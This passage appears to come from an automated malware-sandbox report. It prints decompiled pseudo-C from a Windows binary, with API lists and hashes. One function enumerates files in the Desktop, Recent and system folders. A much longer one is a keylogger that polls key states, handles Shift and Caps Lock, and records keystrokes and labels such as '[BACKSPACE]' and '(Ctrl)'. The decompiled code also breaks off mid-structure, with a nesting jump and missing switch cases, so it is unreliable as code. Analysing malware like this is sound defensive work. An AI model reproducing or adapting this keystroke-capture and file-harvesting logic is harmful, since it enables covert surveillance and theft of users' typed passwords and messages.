                                    							_t205 = _t207 + 0xa0;
                                    							__eflags = _v352.dwFileAttributes & 0x00000010;
                                    							if((_v352.dwFileAttributes & 0x00000010) == 0) {
                                    								_push( &_v1196);
                                    								E240132EC( &_v1460, 0x104,  &(_v352.cFileName));
                                    								E240171A8(_v1460, 0x104,  &_v1456);
                                    								E24013318( &_v1452, 0xff, _v1456);
                                    								_push( &_v1452);
                                    								E240132EC( &_v1468, 0x104,  &(_v352.cFileName));
                                    								E24013388( &_v1464, _v1468, _v8);
                                    								__eflags = 0;
                                    								_pop(_t189);
                                    								E240404A4(_t157, _t189, _t205, _t207, 0);
                                    								E24011BD8( &_v608,  &_v1196);
                                    								E24023314(_v32, 0x240,  &_v928);
                                    							} else {
                                    								E24011BD8( &_v608, 0x2405cc15);
                                    								E24023314(_v28, 0x240,  &_v928);
                                    							}
                                    						}
                                    					}
                                    					L18:
                                    					__eflags = 0;
                                    					_pop(_t183);
                                    					 *[fs:eax] = _t183;
                                    					_push(0x24040c9a);
                                    					return FindClose(_v24);
                                    				} else {
                                    					E24013088(_v12);
                                    					_pop(_t194);
                                    					 *[fs:eax] = _t194;
                                    					_push(0x24040d25);
                                    					E240130AC( &_v1468, 4);
                                    					E240130AC( &_v940, 3);
                                    					E240130AC( &_v20, 2);
                                    					return E24013088( &_v8);
                                    				}
                                    			}

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,24040C93,?,00000000,24040D1E), ref: 24040B62
                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,?,00000000,24040C93,?,00000000,24040D1E), ref: 24040C6F
                                    • FindClose.KERNEL32(000000FF,24040C9A,24040C93,?,00000000,24040D1E), ref: 24040C8D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID: %DESKTOP%$%RECENT%$%SYS%$%WIN%$*.*$Desktop$Recent
                                    • API String ID: 3541575487-3092682246
                                    • Opcode ID: 9333198c916d2e7f6859b0549a39fb8b10b2f4c65fefd0b361ab6c507c8835a6
                                    • Instruction ID: 824e63d778eb24faf684a52e18780895a10fc9cc48681f3b93f5fc644f457a2d
                                    • Opcode Fuzzy Hash: 9333198c916d2e7f6859b0549a39fb8b10b2f4c65fefd0b361ab6c507c8835a6
                                    • Instruction Fuzzy Hash: D7812530E046199FEF11DBA4DC80A9EB7B9AF89308F5044F9A448B7248DB74AFC58F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 90%
                                    			E2405038C(void* __ebx, void* __edi, void* __esi) {
                                    				char* _v8;
                                    				char* _v12;
                                    				char* _v16;
                                    				char* _v20;
                                    				char* _v24;
                                    				char* _v28;
                                    				char* _v32;
                                    				char* _v36;
                                    				char* _v40;
                                    				char* _v44;
                                    				char* _v48;
                                    				char* _v52;
                                    				char* _v56;
                                    				char* _v60;
                                    				char* _v64;
                                    				char* _v68;
                                    				char* _v72;
                                    				char* _v76;
                                    				char* _v80;
                                    				char* _v84;
                                    				char* _v88;
                                    				char* _v92;
                                    				char* _v96;
                                    				char* _v100;
                                    				char* _v104;
                                    				char* _v108;
                                    				char* _v112;
                                    				char* _v116;
                                    				char* _v120;
                                    				char* _v124;
                                    				char* _v128;
                                    				char* _v132;
                                    				char* _v136;
                                    				char* _v140;
                                    				char* _v144;
                                    				char* _v148;
                                    				char* _v152;
                                    				char* _v156;
                                    				char* _v160;
                                    				char* _v164;
                                    				char* _v168;
                                    				char* _v172;
                                    				char* _v176;
                                    				char* _v180;
                                    				char* _v184;
                                    				char* _v188;
                                    				char* _v192;
                                    				char* _v196;
                                    				char* _v200;
                                    				char* _v204;
                                    				char* _v208;
                                    				char* _v212;
                                    				char* _v216;
                                    				char* _v220;
                                    				char* _v224;
                                    				char* _v228;
                                    				char* _v232;
                                    				char* _v236;
                                    				char* _v240;
                                    				char* _v244;
                                    				char* _v248;
                                    				char* _v252;
                                    				char* _v256;
                                    				char* _v260;
                                    				char* _v264;
                                    				char* _v268;
                                    				char* _v272;
                                    				char* _v276;
                                    				char* _v280;
                                    				char* _v284;
                                    				char* _v288;
                                    				char* _v292;
                                    				char* _v296;
                                    				char* _v300;
                                    				char* _v304;
                                    				char* _v308;
                                    				char* _v312;
                                    				char* _v316;
                                    				char* _v320;
                                    				char* _v324;
                                    				char _v328;
                                    				char _v332;
                                    				char _v336;
                                    				char _v340;
                                    				char _v344;
                                    				char _v348;
                                    				char _v352;
                                    				char _v356;
                                    				char _v360;
                                    				char _v364;
                                    				char _v368;
                                    				char _v372;
                                    				void* _t247;
                                    				short _t301;
                                    				short _t302;
                                    				short _t317;
                                    				short _t342;
                                    				short _t343;
                                    				char* _t345;
                                    				void* _t347;
                                    				char* _t351;
                                    				void* _t353;
                                    				short _t356;
                                    				char* _t358;
                                    				void* _t360;
                                    				char* _t364;
                                    				void* _t366;
                                    				short _t370;
                                    				char* _t372;
                                    				void* _t374;
                                    				char* _t378;
                                    				void* _t380;
                                    				char* _t385;
                                    				void* _t387;
                                    				void* _t397;
                                    				void* _t398;
                                    				intOrPtr _t427;
                                    				intOrPtr _t444;
                                    				intOrPtr _t446;
                                    				intOrPtr _t448;
                                    				intOrPtr _t450;
                                    				intOrPtr _t452;
                                    				intOrPtr _t454;
                                    				intOrPtr _t456;
                                    				intOrPtr* _t463;
                                    				intOrPtr _t465;
                                    				intOrPtr _t466;
                                    				void* _t469;
                                    
                                    				_t465 = _t466;
                                    				_t398 = 0x2e;
                                    				goto L1;
                                    				while(1) {
                                    					L3:
                                    					_t469 = GetAsyncKeyState(0) - 0x8001;
                                    					if(_t469 != 0) {
                                    						goto L285;
                                    					}
                                    					E24013480( *_t463, 0x24051db4);
                                    					if(_t469 != 0) {
                                    						E24013480( *_t463, 0x24051dd8);
                                    						if(__eflags != 0) {
                                    							__eflags = 0xfffffffffffffff8 - 0x9d;
                                    							if(0xfffffffffffffff8 > 0x9d) {
                                    								L278:
                                    								_t301 = GetKeyState(0x14);
                                    								__eflags = _t301 - 1;
                                    								if(_t301 != 1) {
                                    									_t302 = GetKeyState(0x10);
                                    									__eflags = _t302;
                                    									if(_t302 >= 0) {
                                    										__eflags = 0;
                                    										E24050318(_t397,  &_v356);
                                    										E240159CC(_v356, _t397,  &_v352, 0x240632f8, _t463, __eflags);
                                    										E24013344(0x240632f8, _v352);
                                    									} else {
                                    										E24050318(_t397,  &_v348);
                                    										E24015948(_v348, _t397,  &_v344, 0x240632f8, _t463, __eflags);
                                    										E24013344(0x240632f8, _v344);
                                    									}
                                    								} else {
                                    									_t317 = GetKeyState(0x10);
                                    									__eflags = _t317;
                                    									if(_t317 >= 0) {
                                    										E24050318(_t397,  &_v340);
                                    										E24015948(_v340, _t397,  &_v336, 0x240632f8, _t463, __eflags);
                                    										E24013344(0x240632f8, _v336);
                                    									} else {
                                    										E24050318(_t397,  &_v332);
                                    										E240159CC(_v332, _t397,  &_v328, 0x240632f8, _t463, __eflags);
                                    										E24013344(0x240632f8, _v328);
                                    									}
                                    								}
                                    								goto L285;
                                    							}
                                    							switch( *((intOrPtr*)( *0x240505FD * 4 +  &M240506A3))) {
                                    								case 0:
                                    									goto L278;
                                    								case 1:
                                    									__eflags =  *((char*)( *0x2405ac1c));
                                    									if( *((char*)( *0x2405ac1c)) != 0) {
                                    										E240135D0(0x240632f8, 1, E2401333C( *0x240632f8));
                                    										 *0x24063300 = E2401333C( *0x240632f8);
                                    									} else {
                                    										E24013344(0x240632f8, "[BACKSPACE]");
                                    									}
                                    									goto L285;
                                    								case 2:
                                    									__eax = __edi;
                                    									__edx = 0x24051e10;
                                    									__eax = E24013344(__edi, 0x24051e10);
                                    									goto L285;
                                    								case 3:
                                    									__eax = __edi;
                                    									__edx = 0x24051e20;
                                    									__eax = E24013344(__edi, 0x24051e20);
                                    									goto L285;
                                    								case 4:
                                    									__eax = __edi;
                                    									__edx = "(Ctrl)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 5:
                                    									__eax = __edi;
                                    									__edx = "(Pause/Break)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 6:
                                    									__eax = __edi;
                                    									__edx = "(Caps Lock)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 7:
                                    									__eax = __edi;
                                    									__edx = 0x24051e68;
                                    									__eax = E24013344(__edi, 0x24051e68);
                                    									goto L285;
                                    								case 8:
                                    									__eax = __edi;
                                    									__edx = 0x24051e78;
                                    									__eax = E24013344(__edi, 0x24051e78);
                                    									goto L285;
                                    								case 9:
                                    									__eax = __edi;
                                    									__edx = "(Page up)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0xa:
                                    									__eax = __edi;
                                    									__edx = "(Page down)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0xb:
                                    									__eax = __edi;
                                    									__edx = 0x24051eac;
                                    									__eax = E24013344(__edi, 0x24051eac);
                                    									goto L285;
                                    								case 0xc:
                                    									__eax = __edi;
                                    									__edx = "(Home)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0xd:
                                    									__eax = __edi;
                                    									__edx = "(Left)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0xe:
                                    									__eax = __edi;
                                    									__edx = 0x24051edc;
                                    									__eax = E24013344(__edi, 0x24051edc);
                                    									goto L285;
                                    								case 0xf:
                                    									__eax = __edi;
                                    									__edx = "(Right)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x10:
                                    									__eax = __edi;
                                    									__edx = "(Down)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x11:
                                    									__eax = __edi;
                                    									__edx = "(Prnt Scrn)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x12:
                                    									__eax = __edi;
                                    									__edx = "(Insert)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x13:
                                    									__eax = __edi;
                                    									__edx = "(Delete)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x14:
                                    									__eax = __edi;
                                    									__edx = "(Left Start)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x15:
                                    									__eax = __edi;
                                    									__edx = "(Right Start)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x16:
                                    									__eax = __edi;
                                    									__edx = "[Num Lock]";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x17:
                                    									__eax = __edi;
                                    									__edx = "(Scroll lock)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x18:
                                    									__eax = __edi;
                                    									__edx = "(Left Ctrl)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x19:
                                    									__eax = __edi;
                                    									__edx = "(Right Ctrl)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x1a:
                                    									__eax = __edi;
                                    									__edx = 0x24051fd0;
                                    									__eax = E24013344(__edi, 0x24051fd0);
                                    									goto L285;
                                    								case 0x1b:
                                    									__eax = __edi;
                                    									__edx = "(Alt Gr)";
                                    									__eax = E24013344(__edi, __edx);
                                    									goto L285;
                                    								case 0x1c:
                                    									__eax =  *__edi;
                                    									__eax = E2401333C( *__edi);
                                    									__eflags = __eax;
                                    									if(__eax <= 0) {
                                    										_push(0x14);
                                    										L240152F0();
                                    										__eflags = __ax - 1;
                                    										if(__ax != 1) {
                                    											_push(0x10);
                                    											L240152F0();
                                    											__eflags = __ax;
                                    											if(__ax >= 0) {
                                    												__edx =  &_v68;
                                    												0 = E24050318(0,  &_v68);
                                    												__eax = _v68;
                                    												__edx =  &_v64;
                                    												__eax = E240159CC(_v68, __ebx,  &_v64, __edi, __esi, __eflags);
                                    												__edx = _v64;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											} else {
                                    												__edx =  &_v60;
                                    												0 = E24050318(0,  &_v60);
                                    												__eax = _v60;
                                    												__edx =  &_v56;
                                    												__eax = E24015948(_v60, __ebx,  &_v56, __edi, __esi, __eflags);
                                    												__edx = _v56;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											}
                                    										} else {
                                    											_push(0x10);
                                    											L240152F0();
                                    											__eflags = __ax;
                                    											if(__ax >= 0) {
                                    												__edx =  &_v52;
                                    												0 = E24050318(0,  &_v52);
                                    												__eax = _v52;
                                    												__edx =  &_v48;
                                    												__eax = E24015948(_v52, __ebx,  &_v48, __edi, __esi, __eflags);
                                    												__edx = _v48;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											} else {
                                    												__edx =  &_v44;
                                    												0 = E24050318(0,  &_v44);
                                    												__eax = _v44;
                                    												__edx =  &_v40;
                                    												__eax = E240159CC(_v44, __ebx,  &_v40, __edi, __esi, __eflags);
                                    												__edx = _v40;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											}
                                    										}
                                    									} else {
                                    										__eax =  *__edi;
                                    										__eax = E2401333C( *__edi);
                                    										__edx =  *__edi;
                                    										__eflags = __edx[__eax - 1] - 0xb4;
                                    										if(__edx[__eax - 1] != 0xb4) {
                                    											__eax =  *__edi;
                                    											__eax = E2401333C( *__edi);
                                    											__edx =  *__edi;
                                    											__eflags = __edx[__eax - 1] - 0x60;
                                    											if(__edx[__eax - 1] != 0x60) {
                                    												__eax =  *__edi;
                                    												__eax = E2401333C( *__edi);
                                    												__edx =  *__edi;
                                    												__eflags = __edx[__eax - 1] - 0x7e;
                                    												if(__edx[__eax - 1] != 0x7e) {
                                    													__eax =  *__edi;
                                    													__eax = E2401333C( *__edi);
                                    													__edx =  *__edi;
                                    													__eflags = __edx[__eax - 1] - 0x5e;
                                    													if(__edx[__eax - 1] != 0x5e) {
                                    														_push(0x14);
                                    														L240152F0();
                                    														__eflags = __ax - 1;
                                    														if(__ax != 1) {
                                    															_push(0x10);
                                    															L240152F0();
                                    															__eflags = __ax;
                                    															if(__ax >= 0) {
                                    																__edx =  &_v36;
                                    																0 = E24050318(0,  &_v36);
                                    																__eax = _v36;
                                    																__edx =  &_v32;
                                    																__eax = E240159CC(_v36, __ebx,  &_v32, __edi, __esi, __eflags);
                                    																__edx = _v32;
                                    																__eax = __edi;
                                    																__eax = E24013344(__edi, __edx);
                                    															} else {
                                    																__edx =  &_v28;
                                    																0 = E24050318(0,  &_v28);
                                    																__eax = _v28;
                                    																__edx =  &_v24;
                                    																__eax = E24015948(_v28, __ebx,  &_v24, __edi, __esi, __eflags);
                                    																__edx = _v24;
                                    																__eax = __edi;
                                    																__eax = E24013344(__edi, __edx);
                                    															}
                                    														} else {
                                    															_push(0x10);
                                    															L240152F0();
                                    															__eflags = __ax;
                                    															if(__ax >= 0) {
                                    																__edx =  &_v20;
                                    																0 = E24050318(0,  &_v20);
                                    																__eax = _v20;
                                    																__edx =  &_v16;
                                    																__eax = E24015948(_v20, __ebx,  &_v16, __edi, __esi, __eflags);
                                    																__edx = _v16;
                                    																__eax = __edi;
                                    																__eax = E24013344(__edi, __edx);
                                    															} else {
                                    																__edx =  &_v12;
                                    																0 = E24050318(0,  &_v12);
                                    																__eax = _v12;
                                    																__edx =  &_v8;
                                    																__eax = E240159CC(_v12, __ebx,  &_v8, __edi, __esi, __eflags);
                                    																__edx = _v8;
                                    																__eax = __edi;
                                    																__eax = E24013344(__edi, __edx);
                                    															}
                                    														}
                                    													} else {
                                    														__eax =  *__edi;
                                    														__edx = E2401333C( *__edi);
                                    														__eax = __edi;
                                    														__ecx = 1;
                                    														__eax = E240135D0(__edi, 1, __edx);
                                    														_push(0x14);
                                    														L240152F0();
                                    														__eflags = __ax - 1;
                                    														if(__ax != 1) {
                                    															_push(0x10);
                                    															L240152F0();
                                    															__eflags = __ax;
                                    															if(__ax >= 0) {
                                    																__eax = __edi;
                                    																__edx = 0x2405203c;
                                    																__eax = E24013344(__edi, 0x2405203c);
                                    															} else {
                                    																__eax = __edi;
                                    																__edx = 0x24052048;
                                    																__eax = E24013344(__edi, 0x24052048);
                                    															}
                                    														} else {
                                    															_push(0x10);
                                    															L240152F0();
                                    															__eflags = __ax;
                                    															if(__ax >= 0) {
                                    																__eax = __edi;
                                    																__edx = 0x24052048;
                                    																__eax = E24013344(__edi, 0x24052048);
                                    															} else {
                                    																__eax = __edi;
                                    																__edx = 0x2405203c;
                                    																__eax = E24013344(__edi, 0x2405203c);
                                    															}
                                    														}
                                    													}
                                    												} else {
                                    													__eax =  *__edi;
                                    													__edx = E2401333C( *__edi);
                                    													__eax = __edi;
                                    													__ecx = 1;
                                    													__eax = E240135D0(__edi, 1, __edx);
                                    													_push(0x14);
                                    													L240152F0();
                                    											__edx = E2401333C( *__edi);
                                    											__eax = __edi;
                                    											__ecx = 1;
                                    											__eax = E240135D0(__edi, 1, __edx);
                                    											_push(0x14);
                                    											L240152F0();
                                    											__eflags = __ax - 1;
                                    											if(__ax != 1) {
                                    												_push(0x10);
                                    												L240152F0();
                                    												__eflags = __ax;
                                    												if(__ax >= 0) {
                                    													__eax = __edi;
                                    													__edx = 0x2405209c;
                                    													__eax = E24013344(__edi, 0x2405209c);
                                    												} else {
                                    													__eax = __edi;
                                    													__edx = 0x240520a8;
                                    													__eax = E24013344(__edi, 0x240520a8);
                                    												}
                                    											} else {
                                    												_push(0x10);
                                    												L240152F0();
                                    												__eflags = __ax;
                                    												if(__ax >= 0) {
                                    													__eax = __edi;
                                    													__edx = 0x240520a8;
                                    													__eax = E24013344(__edi, 0x240520a8);
                                    												} else {
                                    													__eax = __edi;
                                    													__edx = 0x2405209c;
                                    													__eax = E24013344(__edi, 0x2405209c);
                                    												}
                                    											}
                                    										}
                                    									}
                                    									goto L285;
                                    								case 0x1f:
                                    									__eax =  *__edi;
                                    									__eax = E2401333C( *__edi);
                                    									__eflags = __eax;
                                    									if(__eax <= 0) {
                                    										_push(0x14);
                                    										L240152F0();
                                    										__eflags = __ax - 1;
                                    										if(__ax != 1) {
                                    											_push(0x10);
                                    											L240152F0();
                                    											__eflags = __ax;
                                    											if(__ax >= 0) {
                                    												__edx =  &_v260;
                                    												0 = E24050318(0,  &_v260);
                                    												__eax = _v260;
                                    												__edx =  &_v256;
                                    												__eax = E240159CC(_v260, __ebx,  &_v256, __edi, __esi, __eflags);
                                    												__edx = _v256;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											} else {
                                    												__edx =  &_v252;
                                    												0 = E24050318(0,  &_v252);
                                    												__eax = _v252;
                                    												__edx =  &_v248;
                                    												__eax = E24015948(_v252, __ebx,  &_v248, __edi, __esi, __eflags);
                                    												__edx = _v248;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											}
                                    										} else {
                                    											_push(0x10);
                                    											L240152F0();
                                    											__eflags = __ax;
                                    											if(__ax >= 0) {
                                    												__edx =  &_v244;
                                    												0 = E24050318(0,  &_v244);
                                    												__eax = _v244;
                                    												__edx =  &_v240;
                                    												__eax = E24015948(_v244, __ebx,  &_v240, __edi, __esi, __eflags);
                                    												__edx = _v240;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											} else {
                                    												__edx =  &_v236;
                                    												0 = E24050318(0,  &_v236);
                                    												__eax = _v236;
                                    												__edx =  &_v232;
                                    												__eax = E240159CC(_v236, __ebx,  &_v232, __edi, __esi, __eflags);
                                    												__edx = _v232;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											}
                                    										}
                                    									} else {
                                    										__eax =  *__edi;
                                    										__eax = E2401333C( *__edi);
                                    										__edx =  *__edi;
                                    										__eflags = __edx[__eax - 1] - 0xb4;
                                    										if(__edx[__eax - 1] != 0xb4) {
                                    											__eax =  *__edi;
                                    											__eax = E2401333C( *__edi);
                                    											__edx =  *__edi;
                                    											__eflags = __edx[__eax - 1] - 0x60;
                                    											if(__edx[__eax - 1] != 0x60) {
                                    												__eax =  *__edi;
                                    												__eax = E2401333C( *__edi);
                                    												__edx =  *__edi;
                                    												__eflags = __edx[__eax - 1] - 0x7e;
                                    												if(__edx[__eax - 1] != 0x7e) {
                                    													__eax =  *__edi;
                                    													__eax = E2401333C( *__edi);
                                    													__edx =  *__edi;
                                    													__eflags = __edx[__eax - 1] - 0x5e;
                                    													if(__edx[__eax - 1] != 0x5e) {
                                    														_push(0x14);
                                    														L240152F0();
                                    														__eflags = __ax - 1;
                                    														if(__ax != 1) {
                                    															_push(0x10);
                                    															L240152F0();
                                    															__eflags = __ax;
                                    															if(__ax >= 0) {
                                    																__edx =  &_v228;
                                    																0 = E24050318(0,  &_v228);
                                    																__eax = _v228;
                                    																__edx =  &_v224;
                                    																__eax = E240159CC(_v228, __ebx,  &_v224, __edi, __esi, __eflags);
                                    																__edx = _v224;
                                    																__eax = __edi;
                                    																__eax = E24013344(__edi, __edx);
                                    															} else {
                                    																__edx =  &_v220;
                                    																0 = E24050318(0,  &_v220);
                                    																__eax = _v220;
                                    																__edx =  &_v216;
                                    																__eax = E24015948(_v220, __ebx,  &_v216, __edi, __esi, __eflags);
                                    																__edx = _v216;
                                    																__eax = __edi;
                                    																__eax = E24013344(__edi, __edx);
                                    															}
                                    														} else {
                                    															_push(0x10);
                                    															L240152F0();
                                    															__eflags = __ax;
                                    															if(__ax >= 0) {
                                    																__edx =  &_v212;
                                    																0 = E24050318(0,  &_v212);
                                    																__eax = _v212;
                                    																__edx =  &_v208;
                                    																__eax = E24015948(_v212, __ebx,  &_v208, __edi, __esi, __eflags);
                                    																__edx = _v208;
                                    																__eax = __edi;
                                    																__eax = E24013344(__edi, __edx);
                                    															} else {
                                    																__edx =  &_v204;
                                    																0 = E24050318(0,  &_v204);
                                    																__eax = _v204;
                                    																__edx =  &_v200;
                                    																__eax = E240159CC(_v204, __ebx,  &_v200, __edi, __esi, __eflags);
                                    																__edx = _v200;
                                    																__eax = __edi;
                                    																__eax = E24013344(__edi, __edx);
                                    															}
                                    														}
                                    													} else {
                                    														__eax =  *__edi;
                                    														__edx = E2401333C( *__edi);
                                    														__eax = __edi;
                                    														__ecx = 1;
                                    														__eax = E240135D0(__edi, 1, __edx);
                                    														_push(0x14);
                                    														L240152F0();
                                    														__eflags = __ax - 1;
                                    														if(__ax != 1) {
                                    															_push(0x10);
                                    															L240152F0();
                                    															__eflags = __ax;
                                    															if(__ax >= 0) {
                                    																__eax = __edi;
                                    																__edx = 0x2405212c;
                                    																__eax = E24013344(__edi, 0x2405212c);
                                    															} else {
                                    																__eax = __edi;
                                    																__edx = 0x24052138;
                                    																__eax = E24013344(__edi, 0x24052138);
                                    															}
                                    														} else {
                                    															_push(0x10);
                                    															L240152F0();
                                    															__eflags = __ax;
                                    															if(__ax >= 0) {
                                    																__eax = __edi;
                                    																__edx = 0x24052138;
                                    																__eax = E24013344(__edi, 0x24052138);
                                    															} else {
                                    																__eax = __edi;
                                    																__edx = 0x2405212c;
                                    																__eax = E24013344(__edi, 0x2405212c);
                                    															}
                                    														}
                                    													}
                                    												} else {
                                    													__eax =  *__edi;
                                    													__edx = E2401333C( *__edi);
                                    													__eax = __edi;
                                    													__ecx = 1;
                                    													__eax = E240135D0(__edi, 1, __edx);
                                    													_push(0x14);
                                    													L240152F0();
                                    													__eflags = __ax - 1;
                                    													if(__ax != 1) {
                                    														_push(0x10);
                                    														L240152F0();
                                    														__eflags = __ax;
                                    														if(__ax >= 0) {
                                    															__eax = __edi;
                                    															__edx = 0x24052114;
                                    															__eax = E24013344(__edi, 0x24052114);
                                    														} else {
                                    															__eax = __edi;
                                    															__edx = 0x24052120;
                                    															__eax = E24013344(__edi, 0x24052120);
                                    														}
                                    													} else {
                                    														_push(0x10);
                                    														L240152F0();
                                    														__eflags = __ax;
                                    														if(__ax >= 0) {
                                    															__eax = __edi;
                                    															__edx = 0x24052120;
                                    															__eax = E24013344(__edi, 0x24052120);
                                    														} else {
                                    															__eax = __edi;
                                    															__edx = 0x24052114;
                                    															__eax = E24013344(__edi, 0x24052114);
                                    														}
                                    													}
                                    												}
                                    											} else {
                                    												__eax =  *__edi;
                                    												__edx = E2401333C( *__edi);
                                    												__eax = __edi;
                                    												__ecx = 1;
                                    												__eax = E240135D0(__edi, 1, __edx);
                                    												_push(0x14);
                                    												L240152F0();
                                    												__eflags = __ax - 1;
                                    												if(__ax != 1) {
                                    													_push(0x10);
                                    													L240152F0();
                                    													__eflags = __ax;
                                    													if(__ax >= 0) {
                                    														__eax = __edi;
                                    														__edx = 0x240520fc;
                                    														__eax = E24013344(__edi, 0x240520fc);
                                    													} else {
                                    														__eax = __edi;
                                    														__edx = 0x24052108;
                                    														__eax = E24013344(__edi, 0x24052108);
                                    													}
                                    												} else {
                                    													_push(0x10);
                                    													L240152F0();
                                    													__eflags = __ax;
                                    													if(__ax >= 0) {
                                    														__eax = __edi;
                                    														__edx = 0x24052108;
                                    														__eax = E24013344(__edi, 0x24052108);
                                    													} else {
                                    														__eax = __edi;
                                    														__edx = 0x240520fc;
                                    														__eax = E24013344(__edi, 0x240520fc);
                                    													}
                                    												}
                                    											}
                                    										} else {
                                    											__eax =  *__edi;
                                    											__edx = E2401333C( *__edi);
                                    											__eax = __edi;
                                    											__ecx = 1;
                                    											__eax = E240135D0(__edi, 1, __edx);
                                    											_push(0x14);
                                    											L240152F0();
                                    											__eflags = __ax - 1;
                                    											if(__ax != 1) {
                                    												_push(0x10);
                                    												L240152F0();
                                    												__eflags = __ax;
                                    												if(__ax >= 0) {
                                    													__eax = __edi;
                                    													__edx = 0x240520e4;
                                    													__eax = E24013344(__edi, 0x240520e4);
                                    												} else {
                                    													__eax = __edi;
                                    													__edx = 0x240520f0;
                                    													__eax = E24013344(__edi, 0x240520f0);
                                    												}
                                    											} else {
                                    												_push(0x10);
                                    												L240152F0();
                                    												__eflags = __ax;
                                    												if(__ax >= 0) {
                                    													__eax = __edi;
                                    													__edx = 0x240520f0;
                                    													__eax = E24013344(__edi, 0x240520f0);
                                    												} else {
                                    													__eax = __edi;
                                    													__edx = 0x240520e4;
                                    													__eax = E24013344(__edi, 0x240520e4);
                                    												}
                                    											}
                                    										}
                                    									}
                                    									goto L285;
                                    								case 0x20:
                                    									__eax =  *__edi;
                                    									__eax = E2401333C( *__edi);
                                    									__eflags = __eax;
                                    									if(__eax <= 0) {
                                    										_push(0x14);
                                    										L240152F0();
                                    										__eflags = __ax - 1;
                                    										if(__ax != 1) {
                                    											_push(0x10);
                                    											L240152F0();
                                    											__eflags = __ax;
                                    											if(__ax >= 0) {
                                    												__edx =  &_v324;
                                    												0 = E24050318(0,  &_v324);
                                    												__eax = _v324;
                                    												__edx =  &_v320;
                                    												__eax = E240159CC(_v324, __ebx,  &_v320, __edi, __esi, __eflags);
                                    												__edx = _v320;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											} else {
                                    												__edx =  &_v316;
                                    												0 = E24050318(0,  &_v316);
                                    												__eax = _v316;
                                    												__edx =  &_v312;
                                    												__eax = E24015948(_v316, __ebx,  &_v312, __edi, __esi, __eflags);
                                    												__edx = _v312;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											}
                                    										} else {
                                    											_push(0x10);
                                    											L240152F0();
                                    											__eflags = __ax;
                                    											if(__ax >= 0) {
                                    												__edx =  &_v308;
                                    												0 = E24050318(0,  &_v308);
                                    												__eax = _v308;
                                    												__edx =  &_v304;
                                    												__eax = E24015948(_v308, __ebx,  &_v304, __edi, __esi, __eflags);
                                    												__edx = _v304;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											} else {
                                    												__edx =  &_v300;
                                    												0 = E24050318(0,  &_v300);
                                    												__eax = _v300;
                                    												__edx =  &_v296;
                                    												__eax = E240159CC(_v300, __ebx,  &_v296, __edi, __esi, __eflags);
                                    												__edx = _v296;
                                    												__eax = __edi;
                                    												__eax = E24013344(__edi, __edx);
                                    											}
                                    										}
                                    									} else {
                                    										__eax =  *__edi;
                                    										__eax = E2401333C( *__edi);
                                    										__edx =  *__edi;
                                    										__eflags = __edx[__eax - 1] - 0xb4;
                                    										if(__edx[__eax - 1] != 0xb4) {
                                    											__eax =  *__edi;
                                    											__eax = E2401333C( *__edi);
                                    											__edx =  *__edi;
                                    											__eflags = __edx[__eax - 1] - 0x60;
                                    											if(__edx[__eax - 1] != 0x60) {
                                    												__eax =  *__edi;
                                    												__eax = E2401333C( *__edi);
                                    												__edx =  *__edi;
                                    												__eflags = __edx[__eax - 1] - 0x5e;
                                    												if(__edx[__eax - 1] != 0x5e) {
                                    													_push(0x14);
                                    													L240152F0();
                                    													__eflags = __ax - 1;
                                    													if(__ax != 1) {
                                    														_push(0x10);
                                    														L240152F0();
                                    														__eflags = __ax;
                                    														if(__ax >= 0) {
                                    															__edx =  &_v292;
                                    															0 = E24050318(0,  &_v292);
                                    															__eax = _v292;
                                    															__edx =  &_v288;
                                    															__eax = E240159CC(_v292, __ebx,  &_v288, __edi, __esi, __eflags);
                                    															__edx = _v288;
                                    															__eax = __edi;
                                    															__eax = E24013344(__edi, __edx);
                                    														} else {
                                    															__edx =  &_v284;
                                    															0 = E24050318(0,  &_v284);
                                    															__eax = _v284;
                                    															__edx =  &_v280;
